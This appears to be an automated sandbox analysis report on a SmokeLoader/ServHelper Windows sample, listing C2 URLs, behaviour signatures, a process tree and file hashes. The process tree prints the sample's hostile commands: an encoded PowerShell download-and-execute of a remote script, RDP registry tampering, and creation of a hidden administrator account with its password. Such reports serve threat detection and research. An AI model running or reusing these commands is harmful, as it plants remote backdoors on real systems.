Analysis
-
max time kernel
162s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
28-10-2021 16:38
General
-
Target
e5bda93ec7d8724ce496359c5e3efabe.exe
-
Size
185KB
-
MD5
e5bda93ec7d8724ce496359c5e3efabe
-
SHA1
ad9e1db817d0c69760155939c2fd633031f10418
-
SHA256
0610000cdfda33355202ed75a2f542cf035207e5d26d5e4b11063a17cdcdc8be
-
SHA512
53a1e16ab40c0173248b9adf8bb4ecf04fef532301581c63b3876803c8234185fedf4dd588d768e29b610dd5ecc62f933dd79427f086c89741768e5c8cfe9948
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe"C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\8FD8.exeC:\Users\Admin\AppData\Local\Temp\8FD8.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA84.tmp" "c:\Users\Admin\AppData\Local\Temp\ok2j0wes\CSC1F554B787EB747A1B8AA18148AA57AB.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc lbwp0NfX /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc lbwp0NfX /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc lbwp0NfX /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc lbwp0NfX1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc lbwp0NfX2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc lbwp0NfX3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\8FD8.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\8FD8.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RESAA84.tmpMD5
1f5107cde41f9b56ee0669b9d308fe3c
SHA1badd44b4711229daae29976286595ea50c7b3259
SHA25698e6e89bc7ee50963208bfc4d6c8abc2d78668e162cea9fceb241a00e535e959
SHA5120079e538a33fb20250bb5dfbad22183d3a5234cfe7fb20e8189a3e491156f5e8bcd5a0fbb3fe556abdbe9842b0e849110a9fb14b27189df1add3d4a0a2d9d91b
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.dllMD5
61e776ecbbc56e90c4d315ca14b31b5e
SHA190bcda6d41405ff191077e91ea72ea783feb3f7e
SHA25621ecae57c458b694b2750f97c33519bff1b9da253c0f2af277b4e5d8b9a4b685
SHA5123620363d6aaf82dd973e56e0ecbf954938c78b64fc455d3f3d650cbf3f86c5bb423940bfe82ac4e6830465628c4103bd17977d4d6128d4168d2d80508918cd5d
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\ok2j0wes\CSC1F554B787EB747A1B8AA18148AA57AB.TMPMD5
234f28790f7480f6b62d3b41f8578a47
SHA153d4d94f5e36f5e519fb939ea29312c79a15272f
SHA256fbe2d03b4e696077c38caf92564de0748cc1e844fc230858bc0a413e08d3b281
SHA512711756cc090413e971d09fa4abd2a317da518dfd348dbcc1db23b8f6ce3bb79e756990ad31356dbb104472c80777a1414e6594cb0d12de0e9db6eba252aefc56
-
\??\c:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.cmdlineMD5
50ff482f56afe0cfd3c2b235aabbccc9
SHA1fbc72f199cbf7bade6be03c099df51ce6b2f9067
SHA256531ed601b6467c5ca2ed41f220f8fbd7a7442a4075f6c9824711f9e76cb244b8
SHA51282a46ed9c0d3280e64e95d61beb26fd2b63624c14d5ed7812daeb0e3daa91924baab7e89aa43b32e0256ccc6b7b31837051a796b7e2a6653417456eec0a96148
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/692-436-0x000001ED63888000-0x000001ED63889000-memory.dmpFilesize
4KB
-
memory/692-410-0x000001ED63886000-0x000001ED63888000-memory.dmpFilesize
8KB
-
memory/692-403-0x000001ED63880000-0x000001ED63882000-memory.dmpFilesize
8KB
-
memory/692-392-0x0000000000000000-mapping.dmp
-
memory/692-404-0x000001ED63883000-0x000001ED63885000-memory.dmpFilesize
8KB
-
memory/844-282-0x00000239C4563000-0x00000239C4565000-memory.dmpFilesize
8KB
-
memory/844-314-0x00000239C4568000-0x00000239C456A000-memory.dmpFilesize
8KB
-
memory/844-281-0x00000239C4560000-0x00000239C4562000-memory.dmpFilesize
8KB
-
memory/844-313-0x00000239C4566000-0x00000239C4568000-memory.dmpFilesize
8KB
-
memory/844-264-0x0000000000000000-mapping.dmp
-
memory/1012-389-0x0000000000000000-mapping.dmp
-
memory/1128-373-0x0000000000000000-mapping.dmp
-
memory/1148-383-0x0000000000000000-mapping.dmp
-
memory/1240-131-0x0000000000000000-mapping.dmp
-
memory/1240-159-0x0000021EF2880000-0x0000021EF2881000-memory.dmpFilesize
4KB
-
memory/1240-145-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-149-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-150-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-151-0x0000021EF28E6000-0x0000021EF28E8000-memory.dmpFilesize
8KB
-
memory/1240-142-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-141-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-140-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-132-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-139-0x0000021EF28E3000-0x0000021EF28E5000-memory.dmpFilesize
8KB
-
memory/1240-137-0x0000021EF2820000-0x0000021EF2821000-memory.dmpFilesize
4KB
-
memory/1240-138-0x0000021EF28E0000-0x0000021EF28E2000-memory.dmpFilesize
8KB
-
memory/1240-143-0x0000021EF49C0000-0x0000021EF49C1000-memory.dmpFilesize
4KB
-
memory/1240-136-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-161-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-165-0x0000021EF5440000-0x0000021EF5441000-memory.dmpFilesize
4KB
-
memory/1240-166-0x0000021EF57D0000-0x0000021EF57D1000-memory.dmpFilesize
4KB
-
memory/1240-167-0x0000021EF28E8000-0x0000021EF28E9000-memory.dmpFilesize
4KB
-
memory/1240-174-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-175-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-135-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-134-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1240-133-0x0000021EF21D0000-0x0000021EF21D2000-memory.dmpFilesize
8KB
-
memory/1276-374-0x0000000000000000-mapping.dmp
-
memory/1524-462-0x0000000000000000-mapping.dmp
-
memory/1688-184-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-177-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-183-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-185-0x000002307CBE0000-0x000002307CBE2000-memory.dmpFilesize
8KB
-
memory/1688-186-0x000002307CBE3000-0x000002307CBE5000-memory.dmpFilesize
8KB
-
memory/1688-187-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-188-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-190-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-208-0x000002307CBE6000-0x000002307CBE8000-memory.dmpFilesize
8KB
-
memory/1688-176-0x0000000000000000-mapping.dmp
-
memory/1688-178-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-243-0x000002307CBE8000-0x000002307CBEA000-memory.dmpFilesize
8KB
-
memory/1688-179-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-180-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1688-181-0x0000023062D50000-0x0000023062D52000-memory.dmpFilesize
8KB
-
memory/1800-381-0x0000000000000000-mapping.dmp
-
memory/2000-377-0x0000000000000000-mapping.dmp
-
memory/2012-384-0x0000000000000000-mapping.dmp
-
memory/2368-152-0x0000000000000000-mapping.dmp
-
memory/2420-325-0x0000000000000000-mapping.dmp
-
memory/2500-155-0x0000000000000000-mapping.dmp
-
memory/2768-378-0x0000000000000000-mapping.dmp
-
memory/2780-380-0x0000000000000000-mapping.dmp
-
memory/2824-463-0x0000000000000000-mapping.dmp
-
memory/3012-324-0x0000000000000000-mapping.dmp
-
memory/3056-121-0x0000000000720000-0x0000000000736000-memory.dmpFilesize
88KB
-
memory/3212-326-0x0000000000000000-mapping.dmp
-
memory/3220-118-0x0000000003130000-0x0000000003138000-memory.dmpFilesize
32KB
-
memory/3220-120-0x0000000000400000-0x0000000002EF4000-memory.dmpFilesize
43.0MB
-
memory/3220-119-0x0000000003140000-0x0000000003149000-memory.dmpFilesize
36KB
-
memory/3232-364-0x0000000000000000-mapping.dmp
-
memory/3440-391-0x0000000000000000-mapping.dmp
-
memory/3944-368-0x0000000000000000-mapping.dmp
-
memory/4116-390-0x0000000000000000-mapping.dmp
-
memory/4256-382-0x0000000000000000-mapping.dmp
-
memory/4512-379-0x0000000000000000-mapping.dmp
-
memory/4524-363-0x0000000000000000-mapping.dmp
-
memory/4564-372-0x0000000000000000-mapping.dmp
-
memory/4568-371-0x0000000000000000-mapping.dmp
-
memory/4580-125-0x000002034F2B0000-0x000002034F6AF000-memory.dmpFilesize
4.0MB
-
memory/4580-122-0x0000000000000000-mapping.dmp
-
memory/4580-129-0x000002034EE95000-0x000002034EE96000-memory.dmpFilesize
4KB
-
memory/4580-130-0x000002034EE96000-0x000002034EE97000-memory.dmpFilesize
4KB
-
memory/4580-127-0x000002034EE90000-0x000002034EE92000-memory.dmpFilesize
8KB
-
memory/4580-128-0x000002034EE93000-0x000002034EE95000-memory.dmpFilesize
8KB
-
memory/4624-367-0x0000000000000000-mapping.dmp
-
memory/4656-370-0x0000000000000000-mapping.dmp
-
memory/4676-369-0x0000000000000000-mapping.dmp
-
memory/4932-386-0x0000000000000000-mapping.dmp
-
memory/5020-387-0x0000000000000000-mapping.dmp
-
memory/5032-388-0x0000000000000000-mapping.dmp
-
memory/5052-385-0x0000000000000000-mapping.dmp
-
memory/5064-222-0x0000000000000000-mapping.dmp
-
memory/5064-280-0x000001BAC55B8000-0x000001BAC55BA000-memory.dmpFilesize
8KB
-
memory/5064-249-0x000001BAC55B6000-0x000001BAC55B8000-memory.dmpFilesize
8KB
-
memory/5064-247-0x000001BAC55B3000-0x000001BAC55B5000-memory.dmpFilesize
8KB
-
memory/5064-245-0x000001BAC55B0000-0x000001BAC55B2000-memory.dmpFilesize
8KB
